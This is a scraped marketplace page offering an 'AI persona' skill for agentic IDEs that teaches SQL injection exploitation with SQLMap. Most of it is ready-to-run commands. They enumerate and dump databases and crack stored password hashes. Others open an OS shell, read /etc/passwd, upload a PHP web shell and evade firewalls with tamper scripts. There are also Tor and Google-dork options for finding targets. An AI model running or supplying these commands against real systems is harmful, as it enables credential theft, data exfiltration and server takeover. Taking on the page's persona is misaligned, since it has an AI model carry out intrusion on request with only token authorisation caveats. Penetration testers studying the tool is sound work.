Loading...
Loading...
Provide systematic methodologies for automated SQL injection detection and exploitation using SQLMap. This skill covers database enumeration, table and column discovery, data extraction, multiple target specification methods, and advanced exploitation techniques for MySQL, PostgreSQL, MSSQL, Oracle, and other database management systems.
?id=1)# Add single quote to break query
http://target.com/page.php?id=1'
# If error message appears, likely SQL injectable
# Error example: "You have an error in your SQL syntax"
# Basic vulnerability detection
sqlmap -u "http://target.com/page.php?id=1" --batch
# With verbosity for detailed output
sqlmap -u "http://target.com/page.php?id=1" --batch -v 3
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch
Key Options:
-u: Target URL with injectable parameter--dbs: Enumerate database names--batch: Use default answers (non-interactive mode)sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables --batch
Key Options:
-D: Specify target database name--tables: Enumerate table namessqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns --batch
Key Options:
-T: Specify target table name--columns: Enumerate column namessqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump --batch
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users -C username,password --dump --batch
sqlmap -u "http://target.com/page.php?id=1" -D database_name --dump-all --batch
Key Options:
--dump: Extract all data from specified table--dump-all: Extract all data from all tables-C: Specify column names to extract# Save Burp Suite request to file, then:
sqlmap -r /path/to/request.txt --dbs --batch
# Feed log file with multiple requests
sqlmap -l /path/to/logfile --dbs --batch
# Create file with URLs, one per line:
# http://target1.com/page.php?id=1
# http://target2.com/page.php?id=2
sqlmap -m /path/to/bulkfile.txt --dbs --batch
# Automatically find and test vulnerable sites (LEGAL TARGETS ONLY)
sqlmap -g "inurl:?id= site:yourdomain.com" --batch
| Stage | Command |
|-------|---------|
| List Databases | sqlmap -u "URL" --dbs --batch |
| List Tables | sqlmap -u "URL" -D dbname --tables --batch |
| List Columns | sqlmap -u "URL" -D dbname -T tablename --columns --batch |
| Dump Data | sqlmap -u "URL" -D dbname -T tablename --dump --batch |
| Dump All | sqlmap -u "URL" -D dbname --dump-all --batch |
| DBMS | Support Level | |------|---------------| | MySQL | Full Support | | PostgreSQL | Full Support | | Microsoft SQL Server | Full Support | | Oracle | Full Support | | Microsoft Access | Full Support | | IBM DB2 | Full Support | | SQLite | Full Support | | Firebird | Full Support | | Sybase | Full Support | | SAP MaxDB | Full Support | | HSQLDB | Full Support | | Informix | Full Support |
| Technique | Description | Flag |
|-----------|-------------|------|
| Boolean-based blind | Infers data from true/false responses | --technique=B |
| Time-based blind | Uses time delays to infer data | --technique=T |
| Error-based | Extracts data from error messages | --technique=E |
| UNION query-based | Uses UNION to append results | --technique=U |
| Stacked queries | Executes multiple statements | --technique=S |
| Out-of-band | Uses DNS or HTTP for exfiltration | --technique=Q |
| Option | Description |
|--------|-------------|
| -u | Target URL |
| -r | Load HTTP request from file |
| -l | Parse targets from Burp/WebScarab log |
| -m | Bulk file with multiple targets |
| -g | Google dork (use responsibly) |
| --dbs | Enumerate databases |
| --tables | Enumerate tables |
| --columns | Enumerate columns |
| --dump | Dump table data |
| --dump-all | Dump all database data |
| -D | Specify database |
| -T | Specify table |
| -C | Specify columns |
| --batch | Non-interactive mode |
| --random-agent | Use random User-Agent |
| --level | Level of tests (1-5) |
| --risk | Risk of tests (1-3) |
--threads to speed up enumeration (default: 1)--start and --stop for large tables--technique to specify faster injection method if known--random-agent to vary User-Agent header--delay to avoid triggering rate limits--tor for anonymity (authorized tests only)# Step 1: Discover databases
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch
# Result: acuart database found
# Step 2: List tables
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch
# Result: users, products, carts, etc.
# Step 3: List columns
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch
# Result: username, password, email columns
# Step 4: Dump user credentials
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch
# Save Burp request to file (login.txt):
# POST /login.php HTTP/1.1
# Host: target.com
# Content-Type: application/x-www-form-urlencoded
#
# username=admin&password=test
# Run SQLMap with request file
sqlmap -r /root/Desktop/login.txt -p username --dbs --batch
# Create bulkfile.txt:
echo "http://192.168.1.10/sqli/Less-1/?id=1" > bulkfile.txt
echo "http://192.168.1.10/sqli/Less-2/?id=1" >> bulkfile.txt
# Scan all targets
sqlmap -m bulkfile.txt --dbs --batch
# High level and risk for thorough testing
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --level=5 --risk=3
# Specify all techniques
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --technique=BEUSTQ
# Target specific columns
sqlmap -u "http://target.com/page.php?id=1" \
-D webapp \
-T admin_users \
-C admin_name,admin_pass,admin_email \
--dump --batch
# Automatically crack password hashes
sqlmap -u "http://target.com/page.php?id=1" \
-D webapp \
-T users \
--dump --batch \
--passwords
# Get interactive OS shell (requires DBA privileges)
sqlmap -u "http://target.com/page.php?id=1" --os-shell --batch
# Execute specific OS command
sqlmap -u "http://target.com/page.php?id=1" --os-cmd="whoami" --batch
# File read from server
sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd" --batch
# File upload to server
sqlmap -u "http://target.com/page.php?id=1" --file-write="/local/shell.php" --file-dest="/var/www/html/shell.php" --batch
Cause: SQLMap cannot find injection point Solution:
# Increase testing level and risk
sqlmap -u "URL" --dbs --batch --level=5 --risk=3
# Specify parameter explicitly
sqlmap -u "URL" -p "id" --dbs --batch
# Try different injection techniques
sqlmap -u "URL" --dbs --batch --technique=BT
# Add prefix/suffix for filter bypass
sqlmap -u "URL" --dbs --batch --prefix="'" --suffix="-- -"
Cause: Web Application Firewall blocking requests Solution:
# Use tamper scripts
sqlmap -u "URL" --dbs --batch --tamper=space2comment
# List available tamper scripts
sqlmap --list-tampers
# Common tamper combinations
sqlmap -u "URL" --dbs --batch --tamper=space2comment,between,randomcase
# Add delay between requests
sqlmap -u "URL" --dbs --batch --delay=2
# Use random User-Agent
sqlmap -u "URL" --dbs --batch --random-agent
Cause: Network issues or slow target Solution:
# Increase timeout
sqlmap -u "URL" --dbs --batch --timeout=60
# Reduce threads
sqlmap -u "URL" --dbs --batch --threads=1
# Add retries
sqlmap -u "URL" --dbs --batch --retries=5
Cause: Default time delay too conservative Solution:
# Reduce time delay (risky, may cause false negatives)
sqlmap -u "URL" --dbs --batch --time-sec=3
# Use boolean-based instead if possible
sqlmap -u "URL" --dbs --batch --technique=B
Cause: Table has too many records Solution:
# Limit number of records
sqlmap -u "URL" -D db -T table --dump --batch --start=1 --stop=100
# Dump specific columns only
sqlmap -u "URL" -D db -T table -C username,password --dump --batch
# Exclude specific columns
sqlmap -u "URL" -D db -T table --dump --batch --exclude-sysdbs
Cause: Session timeout or connection reset Solution:
# Save and resume session
sqlmap -u "URL" --dbs --batch --output-dir=/root/sqlmap_session
# Resume from saved session
sqlmap -u "URL" --dbs --batch --resume
# Use persistent HTTP connection
sqlmap -u "URL" --dbs --batch --keep-alive
SQLMap Database Penetration Testing is an expert AI persona designed to improve your coding workflow. This skill should be used when the user asks to "automate SQL injection testing," "enumerate database structure," "extract database credentials using sqlmap," "dump tables and columns from a vulnerable database," or "perform automated database penetration testing." It provides comprehensive guidance for using SQLMap to detect and exploit SQL injection vulnerabilities. It provides senior-level context directly within your IDE.
To install the SQLMap Database Penetration Testing skill, download the package, extract the files to your project's .cursor/skills directory, and type @sqlmap-database-pentesting in your editor chat to activate the expert instructions.
Yes, the SQLMap Database Penetration Testing AI persona is completely free to download and integrate into compatible Agentic IDEs like Cursor, Windsurf, Github Copilot, and Anthropic MCP servers.
This skill should be used when the user asks to "automate SQL injection testing," "enumerate database structure," "extract database credentials using sqlmap," "dump tables and columns from a vulnerable database," or "perform automated database penetration testing." It provides comprehensive guidance for using SQLMap to detect and exploit SQL injection vulnerabilities.
Download Skill Package.cursor/skills@sqlmap-database-pentesting in editor chat.Copy the instructions from the panel on the left and paste them into your custom instructions setting.
"Adding this SQLMap Database Penetration Testing persona to my Cursor workspace completely changed the quality of code my AI generates. Saves me hours every week."
Developers who downloaded SQLMap Database Penetration Testing also use these elite AI personas.
Expert in building 3D experiences for the web - Three.js, React Three Fiber, Spline, WebGL, and interactive 3D scenes. Covers product configurators, 3D portfolios, immersive websites, and bringing depth to web experiences. Use when: 3D website, three.js, WebGL, react three fiber, 3D experience.
Structured guide for setting up A/B tests with mandatory gates for hypothesis, metrics, and execution readiness.
You are an accessibility expert specializing in WCAG compliance, inclusive design, and assistive technology compatibility. Conduct audits, identify barriers, and provide remediation guidance.
Explore our most popular utilities designed for the modern Indian creator.